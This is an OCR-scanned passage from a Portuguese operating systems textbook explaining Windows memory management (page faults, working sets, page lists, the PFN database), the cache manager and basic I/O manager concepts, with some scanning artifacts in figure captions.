do hardware e é determinado pelo gerenciador de me- 
mória. Por exemplo, para uma página não mapeada que 
deve ser zerada antes que possa ser usada, esse fato é 
observado na entrada da tabela de páginas. 

Dois bits importantes na entrada da tabela de pági- 
nas são atualizados diretamente pelo hardware: os bits 
A (acesso) e D (suja). Eles controlam quando determi- 
nado mapeamento de página foi utilizado para acessar 
a página e se tal acesso pode ter modificado a página 
com uma operação de escrita. Esse procedimento ajuda 
bastante no desempenho do sistema, pois o gerenciador 
de memória pode fazer uso do bit de acesso para im- 
plementar o estilo de paginação LRU (Least-Recently 
Used — usada menos recentemente). O princípio LRU 
diz que as páginas não usadas há mais tempo são as me- 
nos prováveis de serem utilizadas novamente em um 
futuro próximo. O bit 4 permite que o gerenciador de 
memória determine se uma página foi acessada. O bit 
D permite que o gerenciador de memória saiba se uma 
página foi modificada, ou que não foi modificada — 
que é mais relevante. Caso uma página não tenha sido 
modificada desde sua leitura do disco, o gerenciador de 
memória não precisa escrever seu conteúdo no disco an- 
tes de utilizá-la para alguma outra finalidade. 

Tanto o x86 quanto o x64 utilizam uma entrada de 
tabela de páginas de 64 bits, como mostra a Figura 
11.31. Cada falta de página pode ser considerada como 
estando em uma das cinco categorias a seguir: 


1. A página referenciada não está comprometida. 

2. O acesso à página foi tentado, violando as 
permissões. 

3. Uma página compartilhada do tipo copiar na es- 
crita estava para ser modificada. 

4. A pilha precisa crescer. 


PCD Cache de página desabilitada 
PWT Escrita direta na página 

U/S  Usuário/Supervisor 

RAW Acesso para leitura/escrita 

P Presente (válida) 


5. A página referenciada está comprometida, mas 
não está mapeada. 


O primeiro e o segundo casos devem-se a erros de 
programação. Se um programa tentar utilizar um ende- 
reço para o qual não se supõe existir um mapeamento 
válido ou tentar executar uma operação inválida (como 
escrever em uma página somente de leitura), temos uma 
violação de acesso que em geral resulta no encerramen- 
to do programa. As violações de acesso costumam ser 
o resultado de ponteiros ruins, incluindo o acesso à me- 
mória que foi liberada e teve seu mapeamento removido 
pelo processo. 

O terceiro caso tem os mesmos sintomas do segun- 
do (uma tentativa de escrever em uma página somente 
de leitura), mas o tratamento é diferente. Como a pági- 
na foi marcada como copiar na escrita, o gerenciador 
de memória não reporta uma violação de acesso. Em 
vez disso, ele faz uma cópia privada da página para o 
processo atual e retorna o controle para o thread que 
tentou escrever na página. O thread, por sua vez, tenta 
novamente escrever e agora conclui a operação sem ne- 
nhuma falha. 

O quarto caso ocorre quando um thread coloca um 
valor na pilha e referencia uma página que ainda não 
foi alocada. O gerenciador de memória está programado 
para reconhecer este como um caso especial. Enquan- 
to houver espaço nas páginas reservadas para a pilha, 
o gerenciador de memória oferecerá uma nova página 
física, zerada e mapeada para o processo. Quando a exe- 
cução do thread retoma a execução, ele tenta novamente 
o acesso e, dessa vez, consegue. 

Por fim, no quinto caso tem-se uma falta de página 
normal. Entretanto, esse caso apresenta diversos sub- 
casos. Se a página estiver mapeada por um arquivo, o 
gerenciador de memória deve procurar por estruturas de 
dados, como tabela de páginas protótipo associadas ao 
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objeto de seção, para se certificar de que ainda não exis- 
te uma cópia na memória. Se houver — digamos, em 
outro processo, em uma lista de espera ou em uma lista 
de páginas modificadas — ele simplesmente a compar- 
tilha, talvez marcando como copiar na escrita, caso as 
mudanças não devam ser compartilhadas. Se não existir 
uma cópia, o gerenciador de memória alocará uma pági- 
na física livre e fará com que o arquivo de páginas seja 
copiado do disco, a menos que outra página já esteja 
sendo trazida do disco, assim será necessário apenas es- 
perar o término da transição. 

Quando o gerenciador de memória consegue satisfa- 
zer uma falta de página encontrando a página necessária 
em vez de lê-la do disco, a falta é classificada como fal- 
ta aparente. Se a cópia do disco for necessária, então 
é uma falta estrita. Se comparadas às faltas estritas, as 
aparentes são muito mais baratas e causam menos im- 
pacto no desempenho da aplicação. Elas podem ocorrer 
quando uma página compartilhada já foi mapeada em 
outro processo, quando somente uma nova página ze- 
rada é necessária ou quando a página solicitada foi eli- 
minada do conjunto de trabalho do processo, mas está 
sendo requisitada novamente antes de ter tido a chance 
de ser reutilizada. As faltas aparentes também podem 
ocorrer porque as páginas foram compactadas para efe- 
tivamente aumentar o tamanho da memória física. Para 
a maioria das configurações de CPU, memória e E/S 
nos sistemas atuais, é mais eficiente usar a compactação 
em vez de incorrer no custo da E/S (desempenho e ener- 
gia) exigido para ler uma página do disco. 

Quando uma página física não está mais mapeada 
pela tabela de páginas de nenhum processo, ela é co- 
locada em uma das seguintes listas: livre, modificada 
ou em espera. As páginas que nunca mais serão neces- 
sárias, como as de pilha de processos concluídos, são 
automaticamente liberadas. As que podem causar novas 
faltas vão para a lista de modificadas ou para a lista de 
espera, dependendo da configuração do bit D (modifi- 
cada) para qualquer uma das entradas das tabelas de pá- 
ginas que mapearam a página desde que esta foi lida do 
disco. As páginas na lista de modificadas serão por fim 
escritas no disco e então movidas para a lista de espera. 

O gerenciador de memória pode alocar páginas con- 
forme necessário por meio da lista de livres ou da lista 
de espera. Antes de alocar uma página e copiá-la do dis- 
co, o gerenciador de memória sempre verifica as listas 
de livres e de espera para verificar se a página já está na 
memória. No Windows, o esquema de preparo converte 
as futuras faltas estritas em faltas aparentes por meio do 
carregamento das páginas que devem ser necessárias e 
sua colocação na lista de espera. O próprio gerenciador 


de memória faz uma pequena parte da pré-paginação 
acessando grupos de páginas consecutivas e não de pá- 
ginas individuais. As páginas adicionais são imediata- 
mente colocadas na lista de espera. Esse procedimento 
não costuma ser um desperdício, pois a sobrecarga no 
gerenciador de memória costuma ser causada pelo custo 
de realizar uma única operação de E/S. A leitura de um 
aglomerado de páginas, em vez de uma única página, 
possui um custo adicional desprezível. 

As entradas na tabela de páginas da Figura 11.31 
referem-se a números de páginas físicas, não virtuais. 
Para atualizar as entradas das tabelas de páginas (e di- 
retório de páginas), o núcleo precisa utilizar endereços 
virtuais. O Windows mapeia as tabelas e os diretórios de 
páginas do processo atual no espaço de endereçamento 
virtual do núcleo utilizando uma entrada de automape- 
amento no diretório de páginas, conforme mostrado na 
Figura 11.32. Fazendo as entradas do diretório de pá- 
ginas e fazendo com que ele aponte para o diretório de 
páginas (automapeamento), existem endereços virtuais 
que podem ser utilizados para referenciar entradas de 
diretórios de páginas (a), bem como entradas de tabe- 
las de páginas (b). O automapeamento ocupa os mes- 
mos 8 MB dos endereços virtuais do núcleo para todos 
os processos (na arquitetura x86). Para simplificar, a 
figura mostra o automapeamento do x86 para PTEs 
(Page-Table Entries — entradas de tabela de páginas) 
de 32 bits. O Windows, na realidade, utiliza PTEs de 64 
bits; portanto, o sistema pode utilizar mais de 4 GB de 
memória física. Com PTEs de 32 bits, o automapeamento 
usa apenas uma PDE (Page-Directory Entry — entrada 
de diretório de páginas) no diretório de página, e assim 
ocupa apenas 4 MB de endereços, em vez de 8 MB. 


O algoritmo de substituição de páginas 


Quando o número de páginas de memória física 
livres começa a ficar baixo, o gerenciador de memó- 
ria começa a remover páginas dos processos no modo 
usuário e dos processos do sistema, que representam o 
uso de páginas no modo núcleo, a fim de disponibilizar 
mais páginas físicas. O objetivo é manter as páginas 
virtuais mais importantes na memória e as outras no 
disco. O difícil é determinar o que é importante. No 
Windows, esse conceito é definido pelo uso acentuado 
do conceito de conjunto de trabalho. Cada processo (e 
não cada thread) tem um conjunto de trabalho. Esse 
conjunto consiste nas páginas mapeadas que estão na 
memória e, desse modo, podem ser referenciadas sem 
uma falta de página. O tamanho e a composição do 
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(eU ley) As entradas de automapeamento do Windows são usadas para mapear as páginas físicas das tabelas e diretórios de 
páginas em endereços virtuais do núcleo (mostrados para PTEs de 32 bits). 
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Automapeamento: PD[0xc0300000>>22] é o diretório de paginas (PD) 
Endereço virtual (a): (PTE*)(0xc0300c00) aponta para PD[0x300], que é a entrada de automapeamento do diretório de paginas 
Endereço virtual (b): (PTE*)(0xc0390c84) aponta para a entrada da tabela de páginas (PTE) para o endereço virtual 0xe4321000 








conjunto de trabalho variam, é claro, conforme a exe- 
cução dos threads do processo. 

O conjunto de trabalho de cada processo é descrito por 
dois parâmetros: o tamanho mínimo e o tamanho máxi- 
mo. Esses limites não são rígidos; portanto, um processo 
pode ter menos páginas na memória que seu mínimo, ou 
(em certas circunstâncias) mais que seu máximo. Todo 
processo inicializa com o mesmo mínimo e o mesmo 
máximo, mas esses limites podem mudar com o tempo 
ou podem ser definidos segundo o objeto da tarefa para 
os processos contidos nessa tarefa. O mínimo inicial fica 
entre 20 e 50 páginas e o máximo inicial fica entre 45 e 
345 páginas, dependendo da quantidade total de memória 
física no sistema. O administrador do sistema, todavia, 
pode alterar esses valores iniciais. Embora poucos usuá- 
rios domésticos se interessem em alterar essas definições, 
muitos administradores de servidor poderiam fazê-lo. 

Os conjuntos de trabalho somente entram em ação 
quando a memória física disponível está diminuindo. Se- 
não, os processos têm permissão para consumir o quanto 
desejarem da memória e, em geral, acabam excedendo 
o valor máximo para o conjunto de trabalho. Entretanto, 
quando o sistema fica sob pressão de memória, o ge- 
renciador de memória começa a comprimir os processos 
dentro de seus conjuntos de trabalho, começando pelos 
que já excederam muito o limite. Existem três níveis de 
atividade para o gerenciador do conjunto de trabalho, os 
quais são periodicamente baseados em um temporizador. 
Uma nova atividade é incluída em cada nível: 


1. Muita memória disponível: varre as páginas 
reinicializando os bits de acesso e utilizando seus 
valores para representar a idade de cada uma. 
Mantém uma estimativa de páginas não utiliza- 
das em cada conjunto de trabalho. 

2. A memória está diminuindo: para qualquer 
processo com uma quantidade significativa de 
páginas não utilizadas, para de adicionar páginas 
ao conjunto de trabalho e começa a substituir as 
mais antigas sempre que uma nova página for ne- 
cessária. As páginas substituídas vão para a lista 
de livres ou de espera. 

3. A memória está baixa: remove as páginas mais 
antigas, diminuindo os conjuntos de trabalho para 
que eles fiquem abaixo de seu valor máximo. 


O gerenciador dos conjuntos de trabalho é executado 
a cada segundo, chamado pelo thread gerenciador do 
conjunto de equilíbrio. O gerenciador dos conjuntos de 
trabalho controla a quantidade de trabalho que executa 
para evitar sobrecarga do sistema. Ele também monitora 
a escrita de páginas na lista de modificadas do disco, para 
garantir que a lista não fique muito extensa, e desperta o 
thread ModifiedPageWriter sempre que necessário. 


Gerenciamento da memória física 


Acabamos de mencionar três listas diferentes de 
páginas físicas: a lista de livres, a lista de espera e a 
lista de modificadas. Existe ainda uma quarta lista que 
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contém as páginas livres que foram zeradas. O sistema 
frequentemente precisa de páginas que somente conte- 
nham zeros. Quando novas páginas são entregues aos 
processos, ou quando a última página parcial no final de 
um arquivo é lida, é necessária uma página zerada. Mui- 
to tempo é gasto na escrita de uma página com zeros, 
portanto é melhor utilizar um thread de baixa prioridade 
e criar páginas zeradas em segundo plano. Há também 
uma quinta lista utilizada para armazenar as páginas que 
foram identificadas como contendo erros de hardware 
(isto é, por meio da detecção de erro de hardware). 

Todas as páginas no sistema são referenciadas por 
uma entrada válida de uma tabela de páginas ou estão 
em uma das cinco listas citadas, que são coletivamente 
chamadas de base de dados dos números de quadros 
de páginas (Page Frame Number — base de dados 
PFN), e sua estrutura é mostrada na Figura 11.33. A ta- 
bela é indexada pelo número do quadro de página física. 
As entradas possuem tamanho fixo, mas diferentes for- 
matos são utilizados para tipos de entrada distintos (por 
exemplo, compartilhada versus privada). As entradas 
válidas mantêm o estado da página e um contador que 
informa quantas tabelas de páginas apontam para a pá- 
gina, de forma que o sistema saiba quando uma página 
não está mais em uso. As páginas de um conjunto de tra- 
balho informam quais entradas as referenciam. Existe 
ainda um ponteiro para a tabela de páginas do processo 
que aponta para a página (no caso de páginas não com- 
partilhadas) ou para a tabela de páginas protótipo (no 
caso de páginas compartilhadas). 

Além disso, existe uma referência para a próxi- 
ma página na lista (caso haja uma) e diversos outros 


campos e flags, como leitura em andamento, escrita em 
andamento etc. Para economizar espaço, as listas estão 
ligadas por campos que fazem referência ao próximo 
elemento por meio de seu índice dentro da tabela, e 
não por meio de ponteiros. As entradas da tabela para 
as páginas físicas também são utilizadas para resumir 
os bits de páginas sujas encontrados nas diferentes en- 
tradas da tabela de páginas que apontam para a página 
física (por causa das páginas compartilhadas). Em sis- 
temas servidores maiores, nos quais existem memórias 
mais rápidas para determinados processadores, há ainda 
informações utilizadas na representação das diferenças 
nas páginas da memória. Essas máquinas são denomi- 
nadas máquinas NUMA. 

A movimentação das páginas entre os conjuntos de 
trabalho e as diferentes listas é feita pelo gerenciador de 
conjuntos de trabalho e outros threads do sistema. Va- 
mos ver como ocorrem essas transições. Quando o ge- 
renciador de conjuntos de trabalho remove uma página 
de um conjunto de trabalho, a página segue para o final 
da lista de espera ou da lista de modificadas, dependen- 
do de seu grau de limpeza. Essa transição é mostrada 
em (1) na Figura 11.34. 

As páginas de ambas as listas ainda são consideradas 
válidas e, caso ocorra uma falta de página e uma delas 
seja necessária, ela é removida da lista e colocada de 
volta no conjunto de trabalho sem nenhuma operação 
de E/S no disco (2). Quando um processo termina, suas 
páginas não compartilhadas não podem ser novamente 
carregadas nele e, assim, as páginas válidas em sua ta- 
bela de páginas e qualquer uma de suas páginas nas lis- 
tas de espera ou de modificadas vão para a lista de livres 


lc) E EE] Alguns dos principais campos na base de dados de quadros de página para uma página válida. 


Base de dados de quadros de página 


Estado Cont WS Outro 


14 
13 
Cabeçalhos das listas 42 
11 20 
10 
9 
Modificadas 
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=k 


Tabelas de páginas 
PT Próxima 





(eU EEZ] As várias listas de páginas e as transições entre elas. 
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Página zerada necessária (8) 











Página referenciada (6) 
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Página removida de todos os 
conjuntos de trabalho (1) 


(3). Qualquer espaço relacionado ao arquivo de páginas 
em uso pelo processo também é liberado. 

Outras transições são causadas por outros threads 
do sistema. A cada 4 segundos, o thread gerenciador 
do conjunto de balanceamento é executado e procura 
por processos para os quais existem threads ociosos por 
um determinado número de segundos. Caso encontre, 
as pilhas de núcleo de tais processos são retiradas da 
memória física e suas páginas são movidas para a lista 
de espera ou para a lista de modificadas, também mos- 
tradas como (1). 

Dois outros threads do sistema, o escritor de pági- 
nas mapeadas e o escritor de páginas modificadas, 
despertam periodicamente para verificar se há páginas 
limpas suficientes. Se não houver, eles retiram as pági- 
nas do topo da lista modificada, escrevem-nas de volta 
ao disco e, então, passam-nas para a lista de espera (4). 
O primeiro lida com escritas em arquivos mapeados; o 
último lida com escritas nos arquivos de paginação. O 
resultado dessas escritas é transformar páginas da lis- 
ta de modificadas (sujas) em páginas da lista de espera 
(limpas). 

A razão de haver dois threads é que um arquivo 
mapeado pode precisar crescer como um resultado da 
escrita e esse crescimento requer acessos a estruturas 
de dados em disco para alocar um bloco de disco livre. 
Quando uma página tem de ser escrita, se não houver 
lugar para trazê-la para a memória, poderá ocorrer um 
impasse. O outro thread é capaz de resolver o problema 
escrevendo páginas em um arquivo de paginação. 

As outras transições da Figura 11.34 são as seguin- 
tes. Se um processo deixa de mapear uma página, a pá- 
gina não fica mais associada com um processo e pode 
ir para a lista de livres (5), exceto para o caso em que 
ela seja compartilhada. Quando uma falta de página 


Saída do processo (3) 


Lista de páginas 
de memória 
defeituosas 











requer um quadro de página para manter a página que 
está para ser lida, esse quadro, se possível, é retirado da 
lista de livres (6). Não há problema se a página ainda 
contiver alguma informação confidencial, pois ela será 
totalmente sobrescrita. 

A situação é diferente quando uma pilha cresce. 
Nesse caso, torna-se necessário um quadro de página 
que esteja vazio e as regras de segurança exigem que 
a página só contenha zeros. Por isso, um outro thread 
do sistema, o thread ZeroPage, executa na mais baixa 
prioridade (veja a Figura 11.26), apagando páginas que 
estejam na lista de livres e colocando-as na lista de pá- 
ginas zeradas (7). Sempre que a CPU estiver ociosa e 
houver páginas livres, elas poderão ser zeradas — uma 
vez que uma página zerada é potencialmente mais útil 
que uma página livre e não custa nada zerar uma página 
quando a CPU está ociosa. 

A existência de todas essas listas leva a algumas es- 
colhas políticas sutis. Por exemplo, suponha que uma 
página tenha de ser trazida do disco e a lista de livres es- 
teja vazia. O sistema é, então, obrigado a escolher entre 
tirar uma página limpa da lista de espera (que de outra 
forma poderia vir a sofrer nova falta mais tarde) ou tirar 
uma página vazia da lista de páginas zeradas (desperdi- 
çando o trabalho realizado de zerá-la). O que é melhor? 

O gerenciador de memória deve decidir o quão 
agressivamente os threads do sistema devem mover as 
páginas da lista de modificadas para a lista de espera. 
Ter páginas limpas espalhadas é melhor do que ter pá- 
ginas sujas espalhadas (já que as primeiras podem ser 
instantaneamente reutilizadas), mas uma política de 
limpeza agressiva significa mais operações de E/S no 
disco e ainda existe a possibilidade de uma página que 
acabou de ser limpa ser levada de volta a seu conjunto 
de trabalho e acabar suja de novo. Em geral, o Windows 


654] | SISTEMAS OPERACIONAIS MODERNOS 


resolve esses tipos de dilemas por meio de algoritmos, 
heuristicas, inferências, precedentes históricos, regras 
práticas e configuração de parâmetros controlada pelo 
administrador. 

O Windows moderno introduziu uma camada de 
abstração extra no fundo do gerenciador de memória, 
chamada gerenciador de armazenamento. Essa ca- 
mada toma decisões sobre como otimizar as operações 
de E/S ao armazenamento disponível. Os sistemas de 
armazenamento persistente incluem memória flash au- 
xiliar e SSDs, além de discos rotacionais. O gerenciador 
de armazenamento otimiza onde e como as páginas da 
memória física são copiadas para o armazenamento per- 
sistente no sistema. Ele também implementa técnicas de 
otimização, como o compartilhamento do tipo copiar na 
escrita, para páginas físicas idênticas, e compactação 
das páginas na lista de espera, para efetivamente au- 
mentar a RAM disponível. 

Outra mudança no gerenciamento de memória no 
Windows Moderno é a introdução de um arquivo de 
troca (swap). Historicamente, o gerenciamento de 
memória no Windows tem sido baseado em conjuntos 
de trabalho, conforme já descrevemos. À medida que 
aumenta a pressão sobre a memória, o gerenciador de 
memória espreme os conjuntos de trabalho para redu- 
zir as pegadas que cada processo deixa na memória. O 
modelo de aplicação moderno introduz oportunidades 
para novas eficiências. Visto que o processo que con- 
tém a parte de primeiro plano de uma aplicação mo- 
derna não recebe mais recursos do processador depois 
que o usuário tiver saído dele, não é preciso que suas 
páginas fiquem residentes na memória. À medida que 
a pressão sobre a memória se acumula no sistema, as 
páginas no processo podem ser removidas como par- 
te do gerenciamento normal do conjunto de trabalho. 
Contudo, o gerenciador de tempo de vida do processo 
sabe por quanto tempo se passou desde que o usuário 
passou para o processo em primeiro plano da aplica- 
ção. Quando mais memória for necessária, ele seleciona 
um processo que não foi executado durante um tempo e 
convoca o gerenciador de memória para trocar, de modo 
eficiente, todas as páginas em um pequeno número de 
operações de E/S. As páginas serão gravadas no arquivo 
de troca agregando-as em um ou mais trechos grandes. 
Isso significa que o processo inteiro também pode ser 
restaurado da memória com menos operações de E/S. 

Enfim, o gerenciamento de memória é um compo- 
nente do executivo bastante complexo e com muitas es- 
truturas de dados, algoritmos e heurísticas. Ele tenta ser 
autoajustável ao máximo, mas há também parâmetros 
que os administradores podem ajustar manualmente 


para atuar no desempenho do sistema. Vários desses 
parâmetros e contadores associados são passíveis de se- 
rem verificados com ferramentas de vários dos kits já 
mencionados. O mais importante a lembrar aqui talvez 
seja que o gerenciamento de memória em sistemas reais 
é muito mais que apenas um simples algoritmo de pagi- 
nação, como o do relógio ou de envelhecimento. 


11.6 Caching no Windows 


A cache do Windows aumenta o desempenho de 
sistemas de arquivos mantendo na memória as regiões 
recente e frequentemente utilizadas dos arquivos. Em 
vez de armazenar blocos físicos endereçados a partir do 
disco, o gerenciador de cache administra blocos virtu- 
almente endereçados, ou seja, regiões de arquivos. Essa 
abordagem se encaixa bem na estrutura nativa do sis- 
tema de arquivos do NT (NTFS), conforme veremos 
na Seção 11.8. O NTFS armazena todos os seus dados 
como arquivos, inclusive os metadados do sistema de 
arquivos. 

Essas regiões de arquivos armazenadas em cache 
são chamadas de visões (views), pois representam re- 
giões de endereços virtuais do núcleo mapeadas em ar- 
quivos do sistema de arquivos. Assim, o gerenciamento 
real da memória física na cache é feito pelo gerenciador 
de memória. O papel do gerenciador de cache é admi- 
nistrar o uso dos endereços virtuais do núcleo para as 
visões, organizar para que o gerenciador de memória 
fixe as páginas da cache na memória física e oferecer 
interfaces para os sistemas de arquivos. 

Os recursos do gerenciador de cache do Windows 
são compartilhados com todos os sistemas de arquivos. 
Como a cache é virtualmente endereçada segundo ar- 
quivos individuais, o gerenciador de cache consegue 
realizar com facilidade leituras antecipadas para cada 
arquivo. As solicitações de acesso aos dados armazena- 
dos em cache são enviadas por cada sistema de arqui- 
vos. O procedimento de caching virtual é conveniente, 
porque os sistemas de arquivos não precisam primeiro 
traduzir os deslocamentos em arquivos em números de 
blocos físicos antes de solicitar uma página de arquivo 
em cache. Em vez disso, a tradução acontece mais tarde, 
quando o gerenciador de memória chama o sistema de 
arquivos para acessar a página no disco. 

Além do gerenciamento de endereços virtuais do 
núcleo e de recursos da memória física utilizada na ca- 
che, o gerenciador de cache também precisa estar em 
consonância com os sistemas de arquivos no que diz 
respeito à coerência das visões, as escritas para o disco e 


a correta manutenção dos marcadores de fim de arquivo 
— em especial quando os arquivos se expandem. Um 
dos aspectos mais difíceis de um arquivo a ser gerencia- 
do entre o sistema de arquivos, o gerenciador de cache e 
o gerenciador de memória é o valor do deslocamento do 
ultimo byte do arquivo, chamado de ValidDataLength. 
Se um programa escreve após o final de um arquivo, os 
blocos “pulados” devem ser preenchidos com zeros e, 
por razões de segurança, é essencial que o valor de Va- 
lidDataLength gravado nos metadados do arquivo não 
permita acesso aos blocos não inicializados, e, portanto, 
os blocos zerados devem ser escritos no disco antes que 
os metadados sejam atualizados com o novo tamanho. 
Embora seja esperado que, no caso de quedas do siste- 
ma, alguns blocos no arquivo podem não ter sido atua- 
lizados com os dados da memória, não é aceitável que 
alguns blocos contenham dados que antes pertenciam a 
outros arquivos. 

Vamos agora analisar como o gerenciador de cache 
funciona. Quando um arquivo é referenciado, o geren- 
ciador de cache mapeia 256 KB do espaço de endere- 
çamento virtual do núcleo para o arquivo. Se o arquivo 
for maior do que 256 KB, somente parte dele é mapea- 
da. Se o gerenciador de cache não dispuser mais do que 
256 KB de espaço de endereçamento, ele deve retirar os 
arquivos mais antigos antes de mapear um novo. Uma 
vez mapeado o arquivo, o gerenciador de cache pode 
atender às requisições de blocos desse arquivo apenas 
copiando do espaço de endereçamento virtual do núcleo 
para o buffer do usuário. Se o bloco copiado não estiver 
na memória física, ocorrerá uma falta de página e o ge- 
renciador de memória atenderá a falta da maneira usual. 
O gerenciador de cache nem mesmo ficará sabendo se 
o bloco estava ou não na memória. A cópia sempre será 
bem-sucedida. 

O gerenciador de cache também funciona com pági- 
nas que são mapeadas na memória virtual e acessadas 
com ponteiros em vez de serem copiadas entre os buffers 
do núcleo e do usuário. Quando um thread acessa um 
endereço virtual mapeado para um arquivo e ocorre 
uma falta de página, o gerenciador de memória con- 
segue, em muitos casos, satisfazer o acesso como uma 
falta aparente. Ele não precisa acessar o disco, porque 
descobre que a página já está na memória física por cau- 
sa do mapeamento do gerenciador de cache. 


11.7 Entrada/saída no Windows 


Os objetivos do gerenciador de E/S do Windows são 
fornecer uma estrutura fundamentalmente extensível e 
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flexível para lidar, de modo eficiente, com uma grande 
variedade de dispositivos e serviços de E/S, suportar a 
descoberta automática de dispositivos e instalação de 
driver (plug-and-play) e realizar o gerenciamento de 
energia dos dispositivos e da CPU — tudo por meio de 
uma estrutura fundamentalmente assíncrona que permi- 
te que o processamento se sobreponha às transferências 
de E/S. Existem muitas centenas de milhares de dis- 
positivos que trabalham com o Windows. Para muitos 
desses dispositivos, não é sequer necessário instalar um 
driver, pois já existe um driver distribuído com o sis- 
tema operacional Windows. Ainda assim, considerando 
todas as revisões, há quase um milhão de drivers bi- 
nários diferentes que são executados no Windows. Nas 
próximas seções, estudaremos alguns dos tópicos rela- 
cionados com E/S. 


11.7.1 Conceitos fundamentais 


O gerenciador de E/S é ligado intimamente com o 
gerenciador de recursos plug-and-play. A ideia principal 
por trás dos recursos plug-and-play é o barramento enu- 
merável. Muitos barramentos, incluindo PC Card, PCI, 
PCle, AGP, USB, IEEE 1394, EIDE, SCSI e SATA, fo- 
ram projetados para que o gerenciador de recursos plug- 
-and-play possa enviar uma solicitação para cada slot e 
pedir que o dispositivo se identifique nele. Tendo des- 
coberto qual é, o gerenciador de recursos plug-and-play 
aloca recursos de hardware, como níveis de interrupção, 
localiza os drivers apropriados e os carrega para a me- 
mória. À medida que cada driver é carregado, um objeto 
de driver é criado para ele e, depois, para cada dispo- 
sitivo; assim, pelo menos um objeto de dispositivo é 
alocado. Para alguns barramentos, como o SCSI, a enu- 
meração acontece apenas no momento da inicialização; 
para outros, como o USB, pode acontecer a qualquer 
momento, sendo necessária uma estreita cooperação en- 
tre o gerenciador de recursos plug-and-play, os drivers 
de barramento (que de fato realizam a enumeração) e o 
gerenciador de E/S. 

No Windows, todos os sistemas de arquivos, filtros 
antivírus, gerenciadores de volume, pilhas de protocolo 
de rede e até serviços do núcleo que não têm hardware 
associado são implementados usando-se drivers de E/S. 
A configuração do sistema deve ser ajustada para que 
alguns desses drivers sejam carregados, pois não há dis- 
positivo associado para enumerar no barramento. Ou- 
tros, como os sistemas de arquivos, são carregados por 
código especial que detecta quando eles são solicitados, 
como o reconhecedor de sistemas de arquivos que olha 
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para um volume bruto e decifra que tipo de formato de 
sistema de arquivos ele contém. 

Uma característica interessante do Windows é o 
suporte a discos dinâmicos, que podem cobrir várias 
partições e até mesmo vários discos podendo ser recon- 
figurados em tempo real, sem nem mesmo ter de reini- 
cializar. Dessa forma, os volumes lógicos não são mais 
forçados a uma única partição ou a um único disco, en- 
tão um único sistema de arquivos pode abranger várias 
unidades de forma transparente. 

A E/S para volumes pode ser filtrada por um driver 
especial do Windows para produzir cópias sombra de 
volume. O driver de filtro cria uma imagem instanta- 
nea do volumes, que pode ser montada separadamente 
e representa um volume em um ponto anterior no tem- 
po. Ele faz isso registrando as mudanças que ocorrem 
depois do momento da geração da imagem instantânea. 
Isso é muito conveniente para a recuperação de arqui- 
vos que foram apagados de maneira acidental ou para 
voltar no tempo e ver o estado de um arquivo nas ima- 
gens instantâneas periódicas geradas no passado. 

Entretanto, as cópias sombras também têm seu valor 
por fazerem backups precisos de sistemas servidores. O 
sistema operacional atua com as aplicações de servidor 
para que elas alcancem um ponto conveniente para um 
backup limpo de seu estado persistente no volume. Uma 
vez que todas as aplicações estão prontas, o sistema ini- 
cializa a imagem instantânea do volume e, então, diz às 
aplicações que elas podem continuar. O backup é feito 
do estado do volume no ponto da imagem instantânea, e 
as aplicações foram bloqueadas apenas por um curto es- 
paço de tempo, em vez de terem de ficar desconectadas 
durante o tempo do backup. 

As aplicações participam na geração de imagens 
instantâneas, assim o backup reflete um estado fácil de 
restaurar, caso haja uma falha no futuro. Caso contrário, 
o backup poderia ainda ser útil, mas o estado que ele 
capturou seria mais parecido com o estado se o sistema 
tivesse caído. Recuperar um sistema no ponto de uma 
queda pode ser mais difícil ou até mesmo impossível, 
ja que essas quedas ocorrem em tempos arbitrários na 
execução de uma aplicação. A lei de Murphy diz que as 
quedas têm maior probabilidade de acontecer no pior 
momento possível, isto é, quando os dados da aplicação 
estão em um estado em que a recuperação não é possível. 

Outro aspecto do Windows é seu suporte à E/S as- 
síncrona. É possível que um thread comece uma ope- 
ração de E/S e então continue sendo executado em 
paralelo com a operação de E/S. Essa característica é 
especialmente importante nos servidores. Há várias ma- 
neiras de um thread descobrir se uma operação de E/S 


foi concluída. Uma é especificar um objeto de evento 
no momento em que a chamada for realizada e, então, 
esperar para que ele aconteça. Outra é especificar uma 
fila na qual um evento de conclusão será postado pelo 
sistema quando a operação de E/S estiver terminada. 
Uma terceira é fornecer um procedimento de callback 
que seja chamado pelo sistema quando a operação de 
E/S for concluída. Uma quarta é eleger uma localização 
na memória que o gerenciador de E/S atualize quando a 
operação estiver concluída. 

O aspecto final que vamos mencionar é a E/S prio- 
rizada. A prioridade de E/S é determinada pela prio- 
ridade do thread em questão ou pode ser configurada 
de forma explícita. Há cinco prioridades especificadas: 
crítica, alta, normal, baixa e muito baixa. A crítica é 
reservada para que o gerenciador de memória impeça 
a ocorrência de impasses que poderiam, de outra for- 
ma, acontecer quando o sistema estivesse sob extrema 
pressão com relação à memória. As prioridades baixa e 
muito baixa são usadas em processos de segundo plano, 
como o serviço de desfragmentação de disco, detecto- 
res de spyware e busca na área de trabalho, que tentam 
não interferir na operação normal do sistema. A maior 
parte das E/S tem prioridade normal, mas aplicações 
multimídia podem marcar suas operações de E/S como 
altas para evitarem falhas. Essas aplicações podem, de 
forma alternativa, usar reserva de largura de banda 
para solicitar largura de banda garantida para acessar 
arquivos em tempo crítico, como músicas ou vídeos. 
O sistema de E/S fornecerá à aplicação quantidades 
otimizadas para o melhor tamanho de transferência e 
o número de operações pendentes de E/S que devem 
ser mantidas para que ele consiga atingir a garantia da 
largura de banda solicitada. 


11.7.2 Chamadas das APIs de entrada/saída 


As APIs de chamadas de sistema fornecidas pelo ge- 
renciador de E/S não são muito diferentes das oferecidas 
pela maioria dos sistemas operacionais. As operações 
básicas são open, read, write, ioctl e close, mas também 
há operações para plug-and-play e energia, operações 
para definição de parâmetros, descarga de buffers de 
sistema e outras. Na camada Win32, essas APIs são en- 
volvidas por interfaces que oferecem operações de alto 
nível específicas para alguns dispositivos em particular. 
No fundo, porém, esses invólucros abrem os disposi- 
tivos e realizam esses tipos básicos de operações. Até 
algumas operações com metadados, como renomear ar- 
quivos, são implementadas sem chamadas de sistema 
específicas. Elas apenas usam uma versão especial das 


operações ioctl. Isso fará mais sentido quando explicar- 
mos a implementação de pilhas de dispositivos de E/S e 
o uso de IRPs pelo gerenciador de E/S. 

As chamadas de sistema de E/S nativas do NT, em 
consonância com a filosofia geral do Windows, usam 
muitos parâmetros e incluem muitas variações. A Figura 
11.35 lista as principais interfaces de chamadas de siste- 
ma do gerenciador de E/S. A NtCreateFile é usada para 
abrir arquivos existentes ou novos. Ela oferece descri- 
tores de segurança para novos arquivos, uma rica des- 
